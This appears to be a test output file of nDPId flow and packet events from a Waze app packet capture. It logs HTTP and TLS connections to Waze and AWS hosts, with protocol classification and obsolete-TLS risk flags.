+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871656,"flow_last_seen":1435587871689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871689,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":108,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871656,"flow_last_seen":1435587871690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871918,"flow_last_seen":1435587871918,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871918,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1435587871918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871918,"pkt":"ABoRAAACABoRAAABCABFAAA8cIlAAEAGqJ4KCAABsCJnacdpAbv69x3BAAAAAKAC\/\/\/XPAAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1435587871929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871929,"pkt":"ABoRAAACABoRAAABCABFAAAodKhAABAG1JOwImdpCggAAQG7x2kFCOI++vcdwlAS\/\/\/FGAAA"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871929,"flow_last_seen":1435587871929,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871929,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1435587871929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871929,"pkt":"ABoRAAACABoRAAABCABFAAA8KgBAAEAG7ycKCAABsCJnacdqAbskTkdIAAAAAKAC\/\/+EXgAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1435587871932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871932,"pkt":"ABoRAAACABoRAAABCABFAAAodKlAABAG1JKwImdpCggAAQG7x2rbsbi3JE5HSVAS\/\/\/FFwAA"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871935,"flow_last_seen":1435587871935,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1435587871935,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871935,"pkt":"ABoRAAACABoRAAABCABFAAA8\/WxAAEAGG7sKCAABsCJnacdrAbsTBZAkAAAAAKAC\/\/9MygAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1435587871938,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871938,"pkt":"ABoRAAACABoRAAABCABFAAAodKpAABAG1JGwImdpCggAAQG7x2vs+m\/bEwWQJVAS\/\/\/FFgAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871939,"flow_last_seen":1435587871939,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871939,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1435587871939,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871939,"pkt":"ABoRAAACABoRAAABCABFAAA8xDRAAEAGxZIKCAABNBFy25hiAbudWal8AAAAAKAC\/\/9IxgAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1435587871941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871941,"pkt":"ABoRAAACABoRAAABCABFAAAodKtAABAGRTA0EXLbCggAAQG7mGJiplaDnVmpfVAS\/\/9kvwAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871941,"flow_last_seen":1435587871941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871941,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1435587871941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871941,"pkt":"ABoRAAACABoRAAABCABFAAA8RGdAAEAG0bkKCAABNubjrLHqAFALhykvAAAAAKAC\/\/\/PIgAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1435587871943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871943,"pkt":"ABoRAAACABoRAAABCABFAAAodKxAABAG0Yg25uOsCggAAQBQser0eNbQC4cpMFAS\/\/\/Y+wAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAocIpAAEAGqLEKCAABsCJnacdpAbv69x3CBQjiP1AQ\/\/\/FGQAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoKgFAAEAG7zoKCAABsCJnacdqAbskTkdJ27G4uFAQ\/\/\/FGAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAo\/W1AAEAGG84KCAABsCJnacdrAbsTBZAl7Ppv3FAQ\/\/\/FFwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoxDVAAEAGxaUKCAABNBFy25hiAbudWal9YqZWhFAQ\/\/9kwAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoRGhAAEAG0cwKCAABNubjrLHqAFALhykw9HjW0VAQ\/\/\/Y\/AAA"} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871918,"flow_last_seen":1435587872045,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872045,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871929,"flow_last_seen":1435587872139,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872139,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871935,"flow_last_seen":1435587872205,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872205,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871939,"flow_last_seen":1435587872289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872289,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871941,"flow_last_seen":1435587872340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587872340,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871941,"flow_last_seen":1435587872341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587872341,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872476,"flow_last_seen":1435587872476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587872476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1435587872476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587872476,"pkt":"ABoRAAACABoRAAABCABFAAA8WSJAAEAGvP4KCAABNubjrLHwAFDxQTSmAAAAAKAC\/\/\/drgAAAgQFtAQCCAoACG2EAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1435587872477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872477,"pkt":"ABoRAAACABoRAAABCABFAAAodLxAABAG0Xg25uOsCggAAQBQsfAOvstZ8UE0p1AS\/\/\/Y9QAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1435587872478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872478,"pkt":"ABoRAAACABoRAAABCABFAAAoWSNAAEAGvREKCAABNubjrLHwAFDxQTSnDr7LWlAQ\/\/\/Y9gAA"} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":175,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871935,"flow_last_seen":1435587872515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872515,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871918,"flow_last_seen":1435587872568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871939,"flow_last_seen":1435587872569,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587872569,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872702,"flow_last_seen":1435587872702,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587872702,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 